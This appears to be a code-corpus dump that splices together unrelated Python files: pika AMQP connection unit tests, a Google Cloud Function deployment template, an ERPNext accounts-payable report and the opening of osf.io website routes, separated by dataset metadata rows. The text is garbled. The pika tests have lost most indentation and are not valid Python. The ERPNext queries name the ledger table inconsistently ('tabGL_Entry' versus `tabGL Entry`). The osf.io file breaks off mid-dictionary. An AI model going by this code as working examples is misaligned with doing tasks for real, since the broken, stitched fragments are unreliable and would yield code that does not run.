# Test on closed connection
self.connection.connection_state = self.connection.CONNECTION_CLOSED
with self.assertRaises(AssertionError):
self.connection._close_channels(200, 'reply text')
@mock.patch('pika.frame.ProtocolHeader')
def test_on_stream_connected(self, frame_protocol_header):
"""make sure the _on_stream_connected() sets the state and sends a frame"""
self.connection.connection_state = self.connection.CONNECTION_INIT
self.connection._adapter_connect = mock.Mock(return_value=None)
self.connection._send_frame = mock.Mock()
frame_protocol_header.spec = frame.ProtocolHeader
frame_protocol_header.return_value = 'frame object'
self.connection._on_stream_connected()
self.assertEqual(self.connection.CONNECTION_PROTOCOL,
self.connection.connection_state)
self.connection._send_frame.assert_called_once_with('frame object')
def test_on_connection_start(self):
"""make sure starting a connection sets the correct class vars"""
method_frame = mock.Mock()
method_frame.method = mock.Mock()
method_frame.method.mechanisms = str(credentials.PlainCredentials.TYPE)
method_frame.method.version_major = 0
method_frame.method.version_minor = 9
#This may be incorrectly mocked, or the code is wrong
#TODO: Code does hasattr check, should this be a has_key/in check?
method_frame.method.server_properties = {
'capabilities': {
'basic.nack': True,
'consumer_cancel_notify': False,
'exchange_exchange_bindings': False
}
}
        # This will be called, but should not be implemented here, just mock it
self.connection._flush_outbound = mock.Mock()
self.connection._adapter_emit_data = mock.Mock()
self.connection._on_connection_start(method_frame)
self.assertEqual(True, self.connection.basic_nack)
self.assertEqual(False, self.connection.consumer_cancel_notify)
self.assertEqual(False, self.connection.exchange_exchange_bindings)
self.assertEqual(False, self.connection.publisher_confirms)
@mock.patch('pika.heartbeat.HeartbeatChecker')
@mock.patch('pika.frame.Method')
@mock.patch.object(
ConstructibleConnection,
'_adapter_emit_data',
spec_set=connection.Connection._adapter_emit_data)
def test_on_connection_tune(self,
_adapter_emit_data,
method,
heartbeat_checker):
"""make sure _on_connection_tune tunes the connection params"""
        heartbeat_checker.return_value = 'heartbeat obj'
self.connection._flush_outbound = mock.Mock()
marshal = mock.Mock(return_value='ab')
method.return_value = mock.Mock(marshal=marshal)
        # It may be good to test this here, but I don't want to test too much
self.connection._rpc = mock.Mock()
method_frame = mock.Mock()
method_frame.method = mock.Mock()
method_frame.method.channel_max = 40
method_frame.method.frame_max = 10000
method_frame.method.heartbeat = 10
self.connection.params.channel_max = 20
self.connection.params.frame_max = 20000
self.connection.params.heartbeat = 20
        # Test
        self.connection._on_connection_tune(method_frame)
        # verify
self.assertEqual(self.connection.CONNECTION_TUNE,
self.connection.connection_state)
self.assertEqual(20, self.connection.params.channel_max)
self.assertEqual(10000, self.connection.params.frame_max)
self.assertEqual(20, self.connection.params.heartbeat)
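        # 9992 is the negotiated frame_max (10000) minus the AMQP frame
        # overhead (presumably the 7-byte header plus the 1-byte end marker).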
self.assertEqual(9992, self.connection._body_max_length)
heartbeat_checker.assert_called_once_with(self.connection, 20)
self.assertEqual(
['ab'],
[call[0][0] for call in _adapter_emit_data.call_args_list])
        self.assertEqual('heartbeat obj', self.connection._heartbeat_checker)
        # Pika gives precedence to client heartbeat values if set
# See pika/pika#965.
# Both client and server values set. Pick client value
method_frame.method.heartbeat = 60
self.connection.params.heartbeat = 20
        # Test
        self.connection._on_connection_tune(method_frame)
        # verify
self.assertEqual(20, self.connection.params.heartbeat)
# Client value is None, use the server's
method_frame.method.heartbeat = 500
self.connection.params.heartbeat = None
        # Test
        self.connection._on_connection_tune(method_frame)
        # verify
self.assertEqual(500, self.connection.params.heartbeat)
# Client value is 0, use it
method_frame.method.heartbeat = 60
self.connection.params.heartbeat = 0
        # Test
        self.connection._on_connection_tune(method_frame)
        # verify
self.assertEqual(0, self.connection.params.heartbeat)
# Server value is 0, client value is None
method_frame.method.heartbeat = 0
self.connection.params.heartbeat = None
        # Test
        self.connection._on_connection_tune(method_frame)
        # verify
self.assertEqual(0, self.connection.params.heartbeat)
# Both client and server values are 0
method_frame.method.heartbeat = 0
self.connection.params.heartbeat = 0
        # Test
        self.connection._on_connection_tune(method_frame)
        # verify
self.assertEqual(0, self.connection.params.heartbeat)
# Server value is 0, use the client's
method_frame.method.heartbeat = 0
self.connection.params.heartbeat = 60
        # Test
        self.connection._on_connection_tune(method_frame)
        # verify
self.assertEqual(60, self.connection.params.heartbeat)
# Server value is 10, client passes a heartbeat function that
# chooses max(servervalue,60). Pick 60
def choose_max(conn, val):
self.assertIs(conn, self.connection)
self.assertEqual(val, 10)
return max(val, 60)
method_frame.method.heartbeat = 10
self.connection.params.heartbeat = choose_max
        # Test
        self.connection._on_connection_tune(method_frame)
        # verify
self.assertEqual(60, self.connection.params.heartbeat)
def test_on_connection_close_from_broker_passes_correct_exception(self):
"""make sure connection close from broker passes correct exception"""
method_frame = mock.Mock()
method_frame.method = mock.Mock(spec=spec.Connection.Close)
method_frame.method.reply_code = 1
method_frame.method.reply_text = 'hello'
self.connection._terminate_stream = mock.Mock()
self.connection._on_connection_close_from_broker(method_frame)
        # Check
self.connection._terminate_stream.assert_called_once_with(mock.ANY)
exc = self.connection._terminate_stream.call_args[0][0]
self.assertIsInstance(exc, exceptions.ConnectionClosedByBroker)
self.assertEqual(exc.reply_code, 1)
self.assertEqual(exc.reply_text, 'hello')
def test_on_connection_close_ok(self):
"""make sure _on_connection_close_ok terminates connection"""
method_frame = mock.Mock()
method_frame.method = mock.Mock(spec=spec.Connection.CloseOk)
self.connection._terminate_stream = mock.Mock()
self.connection._on_connection_close_ok(method_frame)
        # Check
self.connection._terminate_stream.assert_called_once_with(None)
@mock.patch('pika.frame.decode_frame')
def test_on_data_available(self, decode_frame):
"""test on data available and process frame"""
data_in = ['data']
self.connection._frame_buffer = ['old_data']
for frame_type in (frame.Method, spec.Basic.Deliver, frame.Heartbeat):
frame_value = mock.Mock(spec=frame_type)
frame_value.frame_type = 2
frame_value.method = 2
frame_value.channel_number = 1
self.connection.bytes_received = 0
self.connection._heartbeat_checker = mock.Mock()
self.connection.frames_received = 0
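            # decode_frame is assumed to return (bytes_consumed, frame); the
            # mock reports 2 bytes consumed and yields the fake frame object.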
decode_frame.return_value = (2, frame_value)
self.connection._on_data_available(data_in)
            # test value
self.assertListEqual([], self.connection._frame_buffer)
self.assertEqual(2, self.connection.bytes_received)
self.assertEqual(1, self.connection.frames_received)
if frame_type == frame.Heartbeat:
self.assertTrue(
self.connection._heartbeat_checker.received.called)
def test_add_on_connection_blocked_callback(self):
blocked_buffer = []
self.connection.add_on_connection_blocked_callback(
lambda conn, frame: blocked_buffer.append((conn, frame)))
# Simulate dispatch of blocked connection
blocked_frame = pika.frame.Method(
0,
pika.spec.Connection.Blocked('reason'))
self.connection._process_frame(blocked_frame)
self.assertEqual(len(blocked_buffer), 1)
conn, frame = blocked_buffer[0]
self.assertIs(conn, self.connection)
self.assertIs(frame, blocked_frame)
def test_add_on_connection_unblocked_callback(self):
unblocked_buffer = []
self.connection.add_on_connection_unblocked_callback(
lambda conn, frame: unblocked_buffer.append((conn, frame)))
# Simulate dispatch of unblocked connection
unblocked_frame = pika.frame.Method(0, pika.spec.Connection.Unblocked())
self.connection._process_frame(unblocked_frame)
self.assertEqual(len(unblocked_buffer), 1)
conn, frame = unblocked_buffer[0]
self.assertIs(conn, self.connection)
self.assertIs(frame, unblocked_frame)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
@mock.patch.object(connection.Connection,
'add_on_connection_blocked_callback')
@mock.patch.object(connection.Connection,
'add_on_connection_unblocked_callback')
def test_create_with_blocked_connection_timeout_config(
self, add_on_unblocked_callback_mock, add_on_blocked_callback_mock,
connect_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
# Check
conn.add_on_connection_blocked_callback.assert_called_once_with(
conn._on_connection_blocked)
conn.add_on_connection_unblocked_callback.assert_called_once_with(
conn._on_connection_unblocked)
@mock.patch.object(ConstructibleConnection, '_adapter_call_later')
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_connection_blocked_sets_timer(self, connect_mock,
call_later_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
# Check
conn._adapter_call_later.assert_called_once_with(
60, conn._on_blocked_connection_timeout)
self.assertIsNotNone(conn._blocked_conn_timer)
@mock.patch.object(ConstructibleConnection, '_adapter_call_later')
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_blocked_connection_multiple_blocked_in_a_row_sets_timer_once(
self, connect_mock, call_later_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
# Simulate Connection.Blocked trigger
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
# Check
conn._adapter_call_later.assert_called_once_with(
60, conn._on_blocked_connection_timeout)
self.assertIsNotNone(conn._blocked_conn_timer)
timer = conn._blocked_conn_timer
# Simulate Connection.Blocked trigger again
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
self.assertEqual(conn._adapter_call_later.call_count, 1)
self.assertIs(conn._blocked_conn_timer, timer)
@mock.patch.object(connection.Connection, '_on_stream_terminated')
@mock.patch.object(
ConstructibleConnection,
'_adapter_call_later',
spec_set=connection.Connection._adapter_call_later)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_blocked_connection_timeout_terminates_connection(
self, connect_mock, call_later_mock, on_terminate_mock):
with mock.patch.multiple(ConstructibleConnection,
_adapter_connect_stream=mock.Mock(),
_terminate_stream=mock.Mock()):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
conn._on_blocked_connection_timeout()
# Check
conn._terminate_stream.assert_called_once_with(mock.ANY)
exc = conn._terminate_stream.call_args[0][0]
self.assertIsInstance(exc, exceptions.ConnectionBlockedTimeout)
self.assertSequenceEqual(exc.args,
['Blocked connection timeout expired.'])
self.assertIsNone(conn._blocked_conn_timer)
@mock.patch.object(ConstructibleConnection, '_adapter_remove_timeout')
@mock.patch.object(
ConstructibleConnection,
'_adapter_call_later',
spec_set=connection.Connection._adapter_call_later)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_blocked_connection_unblocked_removes_timer(
self, connect_mock, call_later_mock, remove_timeout_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
self.assertIsNotNone(conn._blocked_conn_timer)
timer = conn._blocked_conn_timer
conn._on_connection_unblocked(
conn,
mock.Mock(name='frame.Method(Connection.Unblocked)'))
# Check
conn._adapter_remove_timeout.assert_called_once_with(timer)
self.assertIsNone(conn._blocked_conn_timer)
@mock.patch.object(ConstructibleConnection, '_adapter_remove_timeout')
@mock.patch.object(
ConstructibleConnection,
'_adapter_call_later',
spec_set=connection.Connection._adapter_call_later)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
def test_blocked_connection_multiple_unblocked_in_a_row_removes_timer_once(
self, connect_mock, call_later_mock, remove_timeout_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60))
# Simulate Connection.Blocked
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
self.assertIsNotNone(conn._blocked_conn_timer)
timer = conn._blocked_conn_timer
# Simulate Connection.Unblocked
conn._on_connection_unblocked(
conn,
mock.Mock(name='frame.Method(Connection.Unblocked)'))
# Check
conn._adapter_remove_timeout.assert_called_once_with(timer)
self.assertIsNone(conn._blocked_conn_timer)
# Simulate Connection.Unblocked again
conn._on_connection_unblocked(
conn,
mock.Mock(name='frame.Method(Connection.Unblocked)'))
self.assertEqual(conn._adapter_remove_timeout.call_count, 1)
self.assertIsNone(conn._blocked_conn_timer)
@mock.patch.object(ConstructibleConnection, '_adapter_remove_timeout')
@mock.patch.object(
ConstructibleConnection,
'_adapter_call_later',
spec_set=connection.Connection._adapter_call_later)
@mock.patch.object(
connection.Connection,
'_adapter_connect_stream',
spec_set=connection.Connection._adapter_connect_stream)
@mock.patch.object(
ConstructibleConnection,
'_adapter_disconnect_stream',
spec_set=connection.Connection._adapter_disconnect_stream)
def test_blocked_connection_on_stream_terminated_removes_timer(
self, adapter_disconnect_mock, connect_mock, call_later_mock,
remove_timeout_mock):
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(
parameters=connection.ConnectionParameters(
blocked_connection_timeout=60),
on_open_error_callback=lambda *args: None)
conn._on_connection_blocked(
conn,
mock.Mock(name='frame.Method(Connection.Blocked)'))
self.assertIsNotNone(conn._blocked_conn_timer)
timer = conn._blocked_conn_timer
conn._on_stream_terminated(exceptions.StreamLostError())
# Check
conn._adapter_remove_timeout.assert_called_once_with(timer)
self.assertIsNone(conn._blocked_conn_timer)
@mock.patch.object(
ConstructibleConnection,
'_adapter_emit_data',
spec_set=connection.Connection._adapter_emit_data)
def test_send_message_updates_frames_sent_and_bytes_sent(
self,
_adapter_emit_data):
self.connection._flush_outbound = mock.Mock()
self.connection._body_max_length = 10000
method = spec.Basic.Publish(
exchange='my-exchange', routing_key='my-route')
props = spec.BasicProperties()
body = b'b' * 1000000
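        # With a 1,000,000-byte body and a 10,000-byte _body_max_length, the
        # publish should presumably be split into a method frame, a header
        # frame and 100 body frames.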
self.connection._send_method(
channel_number=1, method=method, content=(props, body))
frames_sent = _adapter_emit_data.call_count
bytes_sent = sum(
len(call[0][0]) for call in _adapter_emit_data.call_args_list)
self.assertEqual(self.connection.frames_sent, frames_sent)
self.assertEqual(self.connection.bytes_sent, bytes_sent)
def test_no_side_effects_from_message_marshal_error(self):
# Verify that frame buffer is empty on entry
self.assertEqual(b'', self.connection._frame_buffer)
        # Use Basic.Publish with an invalid body to trigger a marshalling error
method = spec.Basic.Publish()
properties = spec.BasicProperties()
# Verify that marshalling of method and header won't trigger error
frame.Method(1, method).marshal()
frame.Header(1, body_size=10, props=properties).marshal()
# Create bogus body that should trigger an error during marshalling
        body = [1, 2, 3, 4]
# Verify that frame body can be created using the bogus body, but
# that marshalling will fail
frame.Body(1, body)
with self.assertRaises(TypeError):
frame.Body(1, body).marshal()
# Now, attempt to send the method with the bogus body
with self.assertRaises(TypeError):
self.connection._send_method(channel_number=1,
method=method,
content=(properties, body))
# Now make sure that nothing is enqueued on frame buffer
self.assertEqual(b'', self.connection._frame_buffer)
| bsd-3-clause | 6,070,957,001,528,510,000 | 40.98288 | 110 | 0.647197 | false |
aljim/deploymentmanager-samples | community/cloud-foundation/templates/cloud_function/cloud_function.py | 1 | 6561 | # Copyright 2018 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Creates a Cloud Function from a local file system, a Cloud Storage bucket,
or a Cloud Source Repository, and then assigns an HTTPS, Storage, or Pub/Sub
trigger to that Cloud Function.
"""
NO_RESOURCES_OR_OUTPUTS = [], []
def get_source_url_output(function_name):
""" Generates the Cloud Function output with a link to the source archive.
"""
return {
'name': 'sourceArchiveUrl',
'value': '$(ref.{}.sourceArchiveUrl)'.format(function_name)
}
def append_cloud_storage_sources(function, context):
""" Adds source code from the Cloud Storage. """
properties = context.properties
upload_path = properties.get('sourceArchiveUrl')
local_path = properties.get('localUploadPath')
resources = []
outputs = [get_source_url_output(function['name'])]
if local_path:
# The 'upload.py' file must be imported into the YAML file first.
from upload import generate_upload_path, upload_source
upload_path = upload_path or generate_upload_path()
res = upload_source(function, context.imports, local_path, upload_path)
source_resources, source_outputs = res
resources += source_resources
outputs += source_outputs
elif not upload_path:
msg = "Either localUploadPath or sourceArchiveUrl must be provided"
raise Exception(msg)
function['properties']['sourceArchiveUrl'] = upload_path
return resources, outputs
def append_cloud_repository_sources(function, context):
""" Adds the source code from the cloud repository. """
append_optional_property(function,
context.properties,
'sourceRepositoryUrl')
name = function['name']
output = {
'name': 'sourceRepositoryUrl',
'value': '$(ref.{}.sourceRepository.repositoryUrl)'.format(name)
}
return [], [output]
def append_source_code(function, context):
""" Append a reference to the Cloud Function's source code. """
properties = context.properties
if 'sourceArchiveUrl' in properties or 'localUploadPath' in properties:
return append_cloud_storage_sources(function, context)
elif 'sourceRepositoryUrl' in properties:
return append_cloud_repository_sources(function, context)
msg = """At least one of the following properties must be provided:
- sourceRepositoryUrl
- localUploadPath
- sourceArchiveUrl"""
raise ValueError(msg)
def append_trigger_topic(function, properties):
""" Appends the Pub/Sub event trigger. """
topic = properties['triggerTopic']
function['properties']['eventTrigger'] = {
'eventType': 'providers/cloud.pubsub/eventTypes/topic.publish',
'resource': topic
}
return NO_RESOURCES_OR_OUTPUTS
def append_trigger_http(function):
""" Appends the HTTPS trigger and returns the generated URL. """
function['properties']['httpsTrigger'] = {}
output = {
'name': 'httpsTriggerUrl',
'value': '$(ref.{}.httpsTrigger.url)'.format(function['name'])
}
return [], [output]
def append_trigger_storage(function, context):
""" Appends the Storage trigger. """
bucket = context.properties['triggerStorage']['bucketName']
event = context.properties['triggerStorage']['event']
project_id = context.env['project']
function['properties']['eventTrigger'] = {
'eventType': 'google.storage.object.' + event,
'resource': 'projects/{}/buckets/{}'.format(project_id, bucket)
}
return NO_RESOURCES_OR_OUTPUTS
def append_trigger(function, context):
""" Adds the Trigger section and returns all the associated new
resources and outputs.
"""
if 'triggerTopic' in context.properties:
return append_trigger_topic(function, context.properties)
elif 'triggerStorage' in context.properties:
return append_trigger_storage(function, context)
return append_trigger_http(function)
def append_optional_property(function, properties, prop_name):
""" If the property is set, it is added to the function body. """
val = properties.get(prop_name)
if val:
function['properties'][prop_name] = val
return
def create_function_resource(resource_name, context):
""" Creates the Cloud Function resource. """
properties = context.properties
region = properties['region']
function_name = properties.get('name', resource_name)
function = {
'type': 'cloudfunctions.v1beta2.function',
'name': function_name,
'properties':
{
'location': region,
'function': function_name,
},
}
optional_properties = ['entryPoint',
'timeout',
'runtime',
'availableMemoryMb',
'description']
for prop in optional_properties:
append_optional_property(function, properties, prop)
trigger_resources, trigger_outputs = append_trigger(function, context)
code_resources, code_outputs = append_source_code(function, context)
if code_resources:
function['metadata'] = {
'dependsOn': [dep['name'] for dep in code_resources]
}
return (trigger_resources + code_resources + [function],
trigger_outputs + code_outputs + [
{
'name': 'region',
'value': context.properties['region']
},
{
'name': 'name',
'value': '$(ref.{}.name)'.format(function_name)
}
])
def generate_config(context):
""" Entry point for the deployment resources. """
resource_name = context.env['name']
resources, outputs = create_function_resource(resource_name, context)
return {
'resources': resources,
'outputs': outputs
}
| apache-2.0 | 2,122,977,178,188,396,800 | 31.969849 | 81 | 0.636336 | false |
suyashphadtare/test | erpnext/accounts/report/accounts_payable/accounts_payable.py | 1 | 5975 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import getdate, nowdate, flt, cstr
from frappe import msgprint, _
from erpnext.accounts.report.accounts_receivable.accounts_receivable import get_ageing_data
def execute(filters=None):
if not filters: filters = {}
supplier_naming_by = frappe.db.get_value("Buying Settings", None, "supp_master_name")
columns = get_columns(supplier_naming_by)
entries = get_gl_entries(filters)
account_map = dict(((r.name, r) for r in frappe.db.sql("""select acc.name,
supp.supplier_name, supp.name as supplier
from tabAccount acc, tabSupplier supp
where acc.master_type="Supplier" and supp.name=acc.master_name""", as_dict=1)))
entries_after_report_date = [[gle.voucher_type, gle.voucher_no]
for gle in get_gl_entries(filters, before_report_date=False)]
account_supplier_type_map = get_account_supplier_type_map()
voucher_detail_map = get_voucher_details()
# Age of the invoice on this date
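	# The report never ages an invoice as of a future date: if the selected
	# report date is later than today, today's date is used instead.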
age_on = getdate(filters.get("report_date")) > getdate(nowdate()) \
and nowdate() or filters.get("report_date")
data = []
for gle in entries:
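		# Skip payment entries allocated against an invoice dated on or before
		# the report date; those are netted into that invoice's outstanding
		# amount by get_outstanding_amount instead.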
if cstr(gle.against_voucher) == gle.voucher_no or not gle.against_voucher \
or [gle.against_voucher_type, gle.against_voucher] in entries_after_report_date \
or (gle.against_voucher_type == "Purchase Order"):
voucher_details = voucher_detail_map.get(gle.voucher_type, {}).get(gle.voucher_no, {})
invoiced_amount = gle.credit > 0 and gle.credit or 0
outstanding_amount = get_outstanding_amount(gle,
filters.get("report_date") or nowdate())
if abs(flt(outstanding_amount)) > 0.01:
paid_amount = invoiced_amount - outstanding_amount
row = [gle.posting_date, gle.account, gle.voucher_type, gle.voucher_no,
voucher_details.get("due_date", ""), voucher_details.get("bill_no", ""),
voucher_details.get("bill_date", ""), invoiced_amount,
paid_amount, outstanding_amount]
# Ageing
if filters.get("ageing_based_on") == "Due Date":
ageing_based_on_date = voucher_details.get("due_date", "")
else:
ageing_based_on_date = gle.posting_date
row += get_ageing_data(age_on, ageing_based_on_date, outstanding_amount) + \
[account_map.get(gle.account, {}).get("supplier") or ""]
if supplier_naming_by == "Naming Series":
row += [account_map.get(gle.account, {}).get("supplier_name") or ""]
row += [account_supplier_type_map.get(gle.account), gle.remarks]
data.append(row)
for i in range(0, len(data)):
data[i].insert(4, """<a href="%s"><i class="icon icon-share" style="cursor: pointer;"></i></a>""" \
% ("/".join(["#Form", data[i][2], data[i][3]]),))
return columns, data
def get_columns(supplier_naming_by):
columns = [
_("Posting Date") + ":Date:80", _("Account") + ":Link/Account:150", _("Voucher Type") + "::110",
_("Voucher No") + "::120", "::30", _("Due Date") + ":Date:80", _("Bill No") + "::80", _("Bill Date") + ":Date:80",
_("Invoiced Amount") + ":Currency:100", _("Paid Amount") + ":Currency:100",
_("Outstanding Amount") + ":Currency:100", _("Age") + ":Int:50", "0-30:Currency:100",
"30-60:Currency:100", "60-90:Currency:100", _("90-Above") + ":Currency:100",
_("Supplier") + ":Link/Supplier:150"
]
if supplier_naming_by == "Naming Series":
columns += ["Supplier Name::110"]
columns += ["Supplier Type:Link/Supplier Type:120", "Remarks::150"]
return columns
def get_gl_entries(filters, before_report_date=True):
conditions, supplier_accounts = get_conditions(filters, before_report_date)
gl_entries = []
gl_entries = frappe.db.sql("""select * from tabGL_Entry
where docstatus < 2 %s order by posting_date, account""" %
(conditions), tuple(supplier_accounts), as_dict=1)
return gl_entries
def get_conditions(filters, before_report_date=True):
conditions = ""
if filters.get("company"):
conditions += " and company='%s'" % filters["company"].replace("'", "\'")
supplier_accounts = []
if filters.get("account"):
supplier_accounts = [filters["account"]]
else:
supplier_accounts = frappe.db.sql_list("""select name from tabAccount
where ifnull(master_type, '') = 'Supplier' and docstatus < 2 %s""" %
conditions, filters)
if supplier_accounts:
conditions += " and account in (%s)" % (", ".join(['%s']*len(supplier_accounts)))
else:
msgprint(_("No Supplier Accounts found. Supplier Accounts are identified based on 'Master Type' value in account record."), raise_exception=1)
if filters.get("report_date"):
if before_report_date:
conditions += " and posting_date<='%s'" % filters["report_date"]
else:
conditions += " and posting_date>'%s'" % filters["report_date"]
return conditions, supplier_accounts
def get_account_supplier_type_map():
account_supplier_type_map = {}
for each in frappe.db.sql("""select acc.name, supp.supplier_type from tabSupplier supp,
tabAccount acc where supp.name = acc.master_name group by acc.name"""):
account_supplier_type_map[each[0]] = each[1]
return account_supplier_type_map
def get_voucher_details():
voucher_details = {}
for dt in ["Purchase Invoice", "Journal Voucher"]:
voucher_details.setdefault(dt, frappe._dict())
for t in frappe.db.sql("""select name, due_date, bill_no, bill_date
from `tab%s`""" % dt, as_dict=1):
voucher_details[dt].setdefault(t.name, t)
return voucher_details
def get_outstanding_amount(gle, report_date):
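	# Outstanding = invoiced credit - debit on the entry itself - net payments
	# (debits less credits) booked against this voucher up to the report date.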
payment_amount = frappe.db.sql("""
select sum(ifnull(debit, 0)) - sum(ifnull(credit, 0))
		from `tabGL Entry`
where account = %s and posting_date <= %s and against_voucher_type = %s
and against_voucher = %s and name != %s""",
(gle.account, report_date, gle.voucher_type, gle.voucher_no, gle.name))[0][0]
outstanding_amount = flt(gle.credit) - flt(gle.debit) - flt(payment_amount)
return outstanding_amount
| agpl-3.0 | -4,593,431,470,045,977,000 | 39.646259 | 144 | 0.671967 | false |
dobbinx3/pythonScripts | digital_differential_analyzer.py | 1 | 1758 | import sys
import math
print("Welcome to the DDA's algorithm.")
print("\nLet's begin setting the size of the matrix.\n")
columns = int(input("How many columns does the matrix have?\n"))
lines = int(input("How many lines does the matrix have?\n"))
print("\nNow let's set the coordinates of two points, so we can draw a line.\n")
# Create a n*m matrix
matrix = [["." for x in range(columns)] for x in range(lines)]
# Function that turn on the point in the matrix
def connectPoints(x, y):
# By default we round up the number
# If you want to round down uncomment the math.floor() methods, and comment the math.ceil() methods
    # Remember that this algorithm isn't very smart, so do not use the built-in round() function
x = math.ceil(x)
y = math.ceil(y)
# x = math.floor(x)
# y = math.floor(y)
matrix[lines - 1 - y][x] = "X"
# First point
x1 = int(input("Type the 'x' coordinate for the first point\n"))
y1 = int(input("Type the 'y' coordinate for the first point\n"))
# Second point
x2 = int(input("Type the 'x' coordinate for the second point\n"))
y2 = int(input("Type the 'y' coordinate for the second point\n"))
# Absolute value for x and y
xAbsValue = abs(x2 - x1)
yAbsValue = abs(y2 - y1)
# Create size variable
if xAbsValue >= yAbsValue:
size = xAbsValue
else:
size = yAbsValue
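# DDA: the number of steps is the larger of |dx| and |dy|, so each step moves
# at most one unit along the dominant axis.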
# Create delta x and delta y
# Verify that the size is greater than zero
if size > 0:
    deltaX = (x2 - x1) / size
    deltaY = (y2 - y1) / size
else:
    print("\nPlease write two distinct points.")
sys.exit(0)
# Init the counter and the starting point for the while loop
i = 0
x = x1
y = y1
while i <= size:
connectPoints(x, y)
x = x + deltaX
y = y + deltaY
i += 1
print("\n")
for row in matrix:
print(" ".join(row))
| mit | -3,734,755,985,305,867,300 | 24.852941 | 103 | 0.661547 | false |
zachjanicki/osf.io | website/routes.py | 1 | 51186 | # -*- coding: utf-8 -*-
import os
import httplib as http
from flask import request
from flask import send_from_directory
from framework import status
from framework import sentry
from framework.auth import cas
from framework.routing import Rule
from framework.flask import redirect
from framework.routing import WebRenderer
from framework.exceptions import HTTPError
from framework.auth import get_display_name
from framework.routing import xml_renderer
from framework.routing import json_renderer
from framework.routing import process_rules
from framework.auth import views as auth_views
from framework.routing import render_mako_string
from framework.auth.core import _get_current_user
from modularodm import Q
from modularodm.exceptions import QueryException, NoResultsFound
from website import util
from website import prereg
from website import settings
from website import language
from website.util import metrics
from website.util import paths
from website.util import sanitize
from website.models import Institution
from website import landing_pages as landing_page_views
from website import views as website_views
from website.citations import views as citation_views
from website.search import views as search_views
from website.oauth import views as oauth_views
from website.profile import views as profile_views
from website.project import views as project_views
from website.addons.base import views as addon_views
from website.discovery import views as discovery_views
from website.conferences import views as conference_views
from website.preprints import views as preprint_views
from website.institutions import views as institution_views
from website.notifications import views as notification_views
def get_globals():
"""Context variables that are available for every template rendered by
OSFWebRenderer.
"""
user = _get_current_user()
if request.host_url != settings.DOMAIN:
try:
inst_id = (Institution.find_one(Q('domains', 'eq', request.host.lower())))._id
login_url = '{}institutions/{}'.format(settings.DOMAIN, inst_id)
except NoResultsFound:
login_url = request.url.replace(request.host_url, settings.DOMAIN)
else:
login_url = request.url
return {
'private_link_anonymous': is_private_link_anonymous_view(),
'user_name': user.username if user else '',
'user_full_name': user.fullname if user else '',
'user_id': user._primary_key if user else '',
'user_locale': user.locale if user and user.locale else '',
'user_timezone': user.timezone if user and user.timezone else '',
'user_url': user.url if user else '',
'user_gravatar': profile_views.current_user_gravatar(size=25)['gravatar_url'] if user else '',
'user_api_url': user.api_url if user else '',
'user_entry_point': metrics.get_entry_point(user) if user else '',
'display_name': get_display_name(user.fullname) if user else '',
'use_cdn': settings.USE_CDN_FOR_CLIENT_LIBS,
'piwik_host': settings.PIWIK_HOST,
'piwik_site_id': settings.PIWIK_SITE_ID,
'sentry_dsn_js': settings.SENTRY_DSN_JS if sentry.enabled else None,
'dev_mode': settings.DEV_MODE,
'allow_login': settings.ALLOW_LOGIN,
'cookie_name': settings.COOKIE_NAME,
'status': status.pop_status_messages(),
'domain': settings.DOMAIN,
'api_domain': settings.API_DOMAIN,
'disk_saving_mode': settings.DISK_SAVING_MODE,
'language': language,
'noteworthy_links_node': settings.NEW_AND_NOTEWORTHY_LINKS_NODE,
'popular_links_node': settings.POPULAR_LINKS_NODE,
'web_url_for': util.web_url_for,
'api_url_for': util.api_url_for,
'api_v2_url': util.api_v2_url, # URL function for templates
'api_v2_base': util.api_v2_url(''), # Base url used by JS api helper
'sanitize': sanitize,
'sjson': lambda s: sanitize.safe_json(s),
'webpack_asset': paths.webpack_asset,
'waterbutler_url': settings.WATERBUTLER_URL,
'login_url': cas.get_login_url(login_url, auto=True),
'reauth_url': util.web_url_for('auth_logout', redirect_url=request.url, reauth=True),
